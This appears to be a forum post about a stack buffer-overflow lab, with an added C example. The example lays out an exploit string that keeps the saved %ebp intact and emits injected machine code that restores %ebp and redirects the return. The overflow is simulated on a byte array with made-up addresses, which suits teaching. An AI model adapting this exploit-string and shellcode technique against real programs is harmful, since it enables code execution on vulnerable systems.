Posted on 2011-10-07
I'm working on a similar problem and don't understand how this issue was addressed; how did this affect this input string (or assembly code)?
*In order to overwrite the return pointer, you must also overwrite the saved value of %ebp. However, it is important that this value is correctly restored before you return to test. You can do this by either 1) making sure that your exploit string contains the correct value of the saved %ebp in the correct position, so that it never gets corrupted, or 2) restoring the correct value as part of your exploit code. You'll see that the code for test() has some explicit tests to check for a corrupted stack.*
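As an added example (not code from the post, the lab handout, or the lab's bufbomb binary), the following C program shows both options from the quoted hint on a simulated 32-bit frame: the exploit string places the correct saved %ebp (little-endian) in the slot just past the buffer so the overflow leaves it unchanged, and, for option 2, the injected code restores %ebp itself with `mov $imm32,%ebp; push $imm32; ret` before jumping. The buffer size (32 bytes), the absence of alignment padding, and every address are assumptions; the frame lives in a byte array, so nothing here corrupts real memory.

```c
/* Added example: exploit-string layout that preserves the saved %ebp, plus
 * injected code that restores it.  Frame layout, buffer size and addresses
 * are assumptions, not values from the lab. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Assumed 32-bit frame of the vulnerable callee, low address first:
 *   buf[BUF_SIZE] | saved %ebp (4 bytes) | return address (4 bytes) */
#define BUF_SIZE   32u
#define FRAME_SIZE (BUF_SIZE + 8u)

struct frame {
    uint8_t  buf[BUF_SIZE];
    uint32_t saved_ebp;
    uint32_t ret_addr;
};

static void put_le32(uint8_t *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

static uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Option 1: the string restates the correct saved %ebp at offset BUF_SIZE,
 * so the overflow "overwrites" it with the same value.  Returns the string
 * length, or 0 if the code does not fit or any byte is '\n' (a gets()-style
 * reader would stop there). */
size_t build_exploit_string(uint8_t *out, size_t out_len,
                            const uint8_t *code, size_t code_len,
                            uint32_t saved_ebp, uint32_t new_ret)
{
    if (code_len > BUF_SIZE || out_len < FRAME_SIZE) return 0;
    memset(out, 0x90, BUF_SIZE);           /* NOP sled fills the buffer */
    memcpy(out, code, code_len);           /* injected code at buffer start */
    put_le32(out + BUF_SIZE, saved_ebp);   /* keep the saved %ebp intact */
    put_le32(out + BUF_SIZE + 4, new_ret); /* redirect the return */
    for (size_t i = 0; i < FRAME_SIZE; i++)
        if (out[i] == '\n') return 0;
    return FRAME_SIZE;
}

/* Option 2: injected code that repairs %ebp, then jumps to the target:
 *     mov  $saved_ebp, %ebp   ; bd imm32
 *     push $target            ; 68 imm32
 *     ret                     ; c3
 * Returns 11 (the code length), or 0 if out is too small. */
size_t build_restore_ebp_code(uint8_t *out, size_t out_len,
                              uint32_t saved_ebp, uint32_t target)
{
    if (out_len < 11) return 0;
    out[0] = 0xbd; put_le32(out + 1, saved_ebp);
    out[5] = 0x68; put_le32(out + 6, target);
    out[10] = 0xc3;
    return 11;
}

/* Simulate the overflow: write the string over a byte image of the frame the
 * way an unbounded read would, then decode the slots.  Returns 1 if the saved
 * %ebp survived (what test()'s stack check looks for), 0 if it was clobbered. */
int overflow_frame(struct frame *f, const uint8_t *s, size_t len,
                   uint32_t real_ebp, uint32_t real_ret)
{
    uint8_t img[FRAME_SIZE];
    memset(img, 0, sizeof img);
    put_le32(img + BUF_SIZE, real_ebp);
    put_le32(img + BUF_SIZE + 4, real_ret);
    memcpy(img, s, len > sizeof img ? sizeof img : len);  /* the overflow */
    memcpy(f->buf, img, BUF_SIZE);
    f->saved_ebp = get_le32(img + BUF_SIZE);
    f->ret_addr  = get_le32(img + BUF_SIZE + 4);
    return f->saved_ebp == real_ebp;
}

/* Constructed values standing in for the lab's real addresses. */
#define REAL_EBP 0x55683d50u
#define REAL_RET 0x08048c2cu
#define TARGET   0x08048ab0u

/* Careful string: 1 when %ebp is preserved and the return is redirected. */
int demo_preserving_string(void)
{
    uint8_t s[FRAME_SIZE], code[11];
    struct frame f;
    size_t n = build_restore_ebp_code(code, sizeof code, REAL_EBP, TARGET);
    n = build_exploit_string(s, sizeof s, code, n, REAL_EBP, TARGET);
    return n == FRAME_SIZE && overflow_frame(&f, s, n, REAL_EBP, REAL_RET)
           && f.ret_addr == TARGET;
}

/* Naive string of 'A's: returns the clobbered saved %ebp (0x41414141). */
uint32_t demo_naive_string(void)
{
    uint8_t s[FRAME_SIZE];
    struct frame f;
    memset(s, 'A', sizeof s);
    overflow_frame(&f, s, sizeof s, REAL_EBP, REAL_RET);
    return f.saved_ebp;
}
```

The two demo functions contrast the naive all-'A' string, which leaves 0x41414141 in the saved %ebp slot and trips the stack check, with a string that writes the real value back into that slot. The newline check matters in practice because the lab's reader stops at 0x0a, so any address containing that byte cannot be placed in the string directly.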